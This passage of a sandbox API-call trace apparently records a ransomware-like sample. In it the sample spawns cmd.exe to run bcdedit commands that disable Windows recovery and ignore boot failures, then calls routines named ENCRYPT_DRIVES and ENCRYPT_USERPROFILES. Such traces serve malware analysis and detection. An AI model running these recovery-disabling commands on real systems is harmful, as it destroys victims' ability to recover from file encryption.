Flags=0x0, Size=0x4) returned 0x7afdd8 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b9e0 [0044.742] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0044.742] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2ac0 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bae8 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd28 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8380 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afde8 [0044.742] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x6aeb88, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88baa0 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0044.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdc8 [0044.742] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0044.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7ce118 [0044.743] GetCurrentDirectoryW (in: nBufferLength=0x26, lpBuffer=0x7ce118 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.743] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 6881369|bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x6aef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6aef58 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 6881369|bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x6aef58*(hProcess=0x238, hThread=0x234, dwProcessId=0xb54, dwThreadId=0xb60)) returned 1 [0044.748] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe28 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b9b0 [0044.748] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0044.748] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2ac0 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba70 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdc8 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8380 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afde8 [0044.748] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x6aeb88, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bab8 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0044.748] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0044.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7ce118 [0044.748] GetCurrentDirectoryW (in: nBufferLength=0x26, lpBuffer=0x7ce118 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.748] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 6037086|bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x6aef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6aef58 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C title 6037086|bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x6aef58*(hProcess=0x234, hThread=0x238, dwProcessId=0xb70, dwThreadId=0xb64)) returned 1 [0045.591] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.591] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.591] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afed8 [0045.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1418 [0045.591] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0045.591] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afed8 [0045.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1418 [0045.591] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0045.591] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afed8 [0045.591] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1418 [0045.592] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0045.592] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afed8 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4558 [0045.592] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0045.592] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afed8 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4558 [0045.592] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0045.592] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afed8 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1418 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ce8 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afef8 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889598 [0045.592] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2a8 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af498 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889760 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af548 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899e8 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af448 [0045.592] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9308 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889640 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af518 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4558 [0045.593] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x6af200 | out: lpFindFileData=0x6af200*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x74852d, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7734e36c, ftLastAccessTime.dwHighDateTime=0x7734e0d2, ftLastWriteTime.dwLowDateTime=0x8899e8, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x770000, dwReserved1=0x7b4558, cFileName="탸7\x02", cAlternateFileName="")) returned 0xffffffff [0045.593] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2a8 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4558 [0045.593] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0045.593] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0cc0 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c430 [0045.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af278 [0045.593] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFindFileData=0x6aeec0 | out: lpFindFileData=0x6aeec0*(dwFileAttributes=0x1d80091, ftCreationTime.dwLowDateTime=0x37e92c, ftCreationTime.dwHighDateTime=0x77391ecd, ftLastAccessTime.dwLowDateTime=0x7499cd, ftLastAccessTime.dwHighDateTime=0xfffffffe, ftLastWriteTime.dwLowDateTime=0x6aeee4, ftLastWriteTime.dwHighDateTime=0x8e0092, nFileSizeHigh=0x37e92c, nFileSizeLow=0xc000000f, dwReserved0=0x6af1c8, dwReserved1=0x777648, cFileName="\x0f쀀\x08", cAlternateFileName="⬐{jဓĩ\x10")) returned 0xffffffff [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891a8 | out: hHeap=0x770000) returned 1 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889658 | out: hHeap=0x770000) returned 1 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2b10 | out: hHeap=0x770000) returned 1 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af288 | out: hHeap=0x770000) returned 1 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2b10 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889658 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891a8 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889940 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af388 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889940 | out: hHeap=0x770000) returned 1 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af388 | out: hHeap=0x770000) returned 1 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2b38 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889940 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af388 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a48 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d60 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdd8 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889d60 | out: hHeap=0x770000) returned 1 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdd8 | out: hHeap=0x770000) returned 1 [0045.594] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdd8 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2b60 [0045.594] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2b60 | out: hHeap=0x770000) returned 1 [0045.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdd8 | out: hHeap=0x770000) returned 1 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889d60 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9b0 [0045.594] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdd8 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe28 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0xaa1ac0 [0045.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889298 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0045.595] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe28 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe28 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9308 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa9308 | out: hHeap=0x770000) returned 1 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdd8 | out: hHeap=0x770000) returned 1 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0045.595] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2b60 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdd8 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2b88 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe28 [0045.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897a8 | out: hHeap=0x770000) returned 1 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2bb0 [0045.595] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889790 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.596] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889790 | out: hHeap=0x770000) returned 1 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897a8 | out: hHeap=0x770000) returned 1 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2bb0 | out: hHeap=0x770000) returned 1 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0045.596] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe28 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe58 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9308 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa9308 | out: hHeap=0x770000) returned 1 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0045.596] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe28 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0xaa1ac0 [0045.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2bb0 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7afe28 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2bd8 [0045.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889790 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c00 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889478 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe18 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889478 | out: hHeap=0x770000) returned 1 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c28 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889478 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0045.597] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe58 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe58 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe58 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0045.597] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889478 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c28 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c00 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889790 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe28 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2bb0 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897a8 | out: hHeap=0x770000) returned 1 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2bd8 | out: hHeap=0x770000) returned 1 [0045.597] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2bd8 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0045.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe28 [0045.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897a8 | out: hHeap=0x770000) returned 1 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2bb0 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897a8 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889790 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.598] HeapFree (in: 